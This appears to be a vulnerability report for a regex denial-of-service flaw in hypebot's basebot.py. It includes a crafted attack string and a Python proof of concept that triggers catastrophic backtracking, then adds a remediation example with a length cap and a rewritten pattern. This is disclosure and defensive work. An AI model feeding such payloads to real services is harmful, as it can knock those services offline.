The ReDoS vulnerability can be exploited with the following string:
$(!!:"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":""!
You can execute the following code to reproduce the ReDoS:
```python
import re
from time import perf_counter

# Vulnerable pattern from hypebot/basebot.py (raw string so the backslashes
# are not treated as Python escape sequences). The leading [^\(\)]+ and the
# repeated group [^\(\)]*".*?"[^\(\)]* overlap, so when no closing ')' is
# found the engine tries every way of splitting the quotes between them.
REGEX = re.compile(r'\$\(([^\(\)]+(?:[^\(\)]*".*?"[^\(\)]*)*)\)')

# Attack input: a "$(" opener, many quoted empty strings, and no closing ")".
ATTACK = '$(!!:"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":""!'
LEN = len(ATTACK)

BEGIN = perf_counter()
print(REGEX.search(ATTACK))  # prints None, but only after exponential backtracking
DURATION = perf_counter() - BEGIN
print(f"{LEN}: took {DURATION} seconds!")
```
I think you can limit the input length or modify this regex.
Type of Issue: Potential Regex Denial of Service (ReDoS)

Description: The vulnerable regular expression is located in
https://github.com/google/hypebot/blob/dd500026438af2d1154c26ba0201fa22e4c3280e/hypebot/basebot.py#L248
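The following is an added example (not the reporter's code and not hypebot's own) that puts the two fixes suggested above side by side: an input-length cap in front of the regex, and a rewrite of the pattern so that every character inside `$( ... )` can be consumed by exactly one alternative, which removes the overlap that causes the backtracking. The `HARDENED` pattern, the `MAX_INPUT_LEN` value of 512, and the helper names `find_command`, `time_search` and `attack_string` are all assumptions made for this example. Note one deliberate difference: the hardened pattern requires double quotes inside the command to come in pairs, whereas the original also accepted a stray unpaired quote via its leading `[^\(\)]+`.

```python
import re
from time import perf_counter

# Vulnerable pattern as quoted in the issue, kept for comparison only.
VULNERABLE = re.compile(r'\$\(([^\(\)]+(?:[^\(\)]*".*?"[^\(\)]*)*)\)')

# Hardened rewrite (assumed for this example, not hypebot's code).
# Inside $( ... ) each character is either a non-paren, non-quote character
# or part of a complete "..." string (which may contain parentheses).
# Because the two alternatives cannot match the same character, the engine
# never has two ways to split the same input and backtracking stays linear.
HARDENED = re.compile(r'\$\(((?:[^()"]|"[^"]*")+)\)')

# Assumed cap on message length checked before any regex runs.
MAX_INPUT_LEN = 512


def find_command(text, pattern=HARDENED, max_len=MAX_INPUT_LEN):
    """Return the body of the first $( ... ) in text, or None.

    Over-long input is rejected before the regex runs so the worst-case
    cost is bounded even if a pattern with a backtracking problem slips in.
    """
    if len(text) > max_len:
        return None
    match = pattern.search(text)
    return match.group(1) if match else None


def time_search(pattern, text):
    """Seconds spent by pattern.search(text); used to compare the two patterns."""
    start = perf_counter()
    pattern.search(text)
    return perf_counter() - start


def attack_string(quote_pairs):
    """Constructed input in the shape reported in the issue: an opener, a run of
    empty quoted strings, and no closing parenthesis."""
    return '$(!!:' + '"":' * quote_pairs + '""!'


if __name__ == "__main__":
    sample = '$(echo "a (b)" c)'
    print("normal input, hardened :", find_command(sample))
    print("normal input, original :", find_command(sample, VULNERABLE))

    # The original pattern is timed on a short run only; its cost doubles with
    # every extra quote pair, which is the whole point of the report.
    short = attack_string(8)
    print(f"{len(short)} chars, original : {time_search(VULNERABLE, short):.4f}s")
    long = attack_string(40)
    print(f"{len(long)} chars, hardened : {time_search(HARDENED, long):.6f}s")
    print("oversized input :", find_command('$(' + 'a' * 600 + ')'))
```

Running the script shows the hardened pattern returning in microseconds on the same 40-pair input that the original needs seconds for, while `find_command` answers `None` for the oversized message without ever invoking the regex.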